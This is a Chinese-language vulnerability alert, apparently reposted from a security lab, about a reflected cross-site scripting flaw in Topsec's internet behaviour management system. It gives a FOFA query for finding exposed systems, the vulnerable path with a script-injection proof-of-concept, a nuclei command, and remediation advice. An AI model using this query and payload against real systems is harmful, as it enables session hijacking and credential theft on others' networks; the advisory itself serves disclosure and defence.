文章总结： 天融信上网行为管理系统PC存在跨站脚本漏洞，攻击者可通过构造恶意参数注入JavaScript代码，导致Cookie窃取、会话劫持、页面篡改等风险。文档提供了漏洞复现方法、FOFA语法和nuclei验证脚本，建议升级系统版本、加强输入过滤、配置WAF防护等措施。 综合评分： 65 文章分类： 漏洞预警,WEB安全,漏洞分析,解决方案,安全工具

漏洞预警｜天融信上网行为管理 PC 存在跨站脚本漏洞

by 融云安全-sm by 融云安全-sm

融云攻防实验室

2026年5月13日 17:25 江西

在小说阅读器读本章

去阅读

📌 0x01 漏洞描述

近期监测发现，天融信 上网行为管理系统 PC 存在跨站脚本漏洞（XSS）。

攻击者可通过构造恶意参数，在页面中注入 JavaScript 代码，当用户访问恶意链接后，可能导致：

▪️ Cookie 窃取 ▪️ 会话劫持 ▪️ 页面篡改 ▪️ 钓鱼跳转 ▪️ 后台权限进一步利用

⚠️ 若后台管理员访问恶意链接，风险将进一步扩大。

━━━━━━━━━━━━━━━━━━

🌐 0x02 FOFA 语法

body="ActiveXObject" && body="dkey_login" && body="repeat-x"

━━━━━━━━━━━━━━━━━━

💥 0x03 漏洞复现

/smsauth/adverdeclare/pc.php?orgi=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

若页面成功弹出：

alert(1)

则说明目标存在漏洞风险。

━━━━━━━━━━━━━━━━━━

🧪 nuclei 验证

nuclei 验证脚本已发布至知识星球。

nuclei -t topsec-acm-pc-xss.yaml -u http://target.com

━━━━━━━━━━━━━━━━━━

⚠️ 0x04 漏洞影响

攻击者可能利用该漏洞实现：

▪️ 获取用户 Cookie 信息 ▪️ 劫持管理员会话 ▪️ 页面恶意跳转 ▪️ 钓鱼攻击 ▪️ 配合其他漏洞进一步渗透内网

━━━━━━━━━━━━━━━━━━

🛡️ 0x05 修复建议

✅ 升级至官方最新安全版本 ✅ 对用户输入进行过滤与转义 ✅ 配置 WAF/XSS 防护策略 ✅ 禁止后台系统直接暴露互联网 ✅ 排查异常访问日志 ✅ 定期开展漏洞扫描与安全巡检

网络安全神兵利器分享

网络安全漏洞N/0day分享

加入星球请扫描下方二维码，更多精，敬请期待！

👇👇👇

0x04 公司简介

江西渝融云安全科技有限公司，2017年发展至今，已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司，是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证，拥有软件著作权十八项；荣获2020年全国工控安全深度行安全攻防对抗赛三等奖；庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……

编制：sm

审核：fjh

审核：Dog

1个1朵5毛钱

天天搬砖的小M

能不能吃顿好的

就看你们的啦

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：融云攻防实验室 by 融云安全-sm by 融云安全-sm《漏洞预警｜天融信上网行为管理 PC 存在跨站脚本漏洞》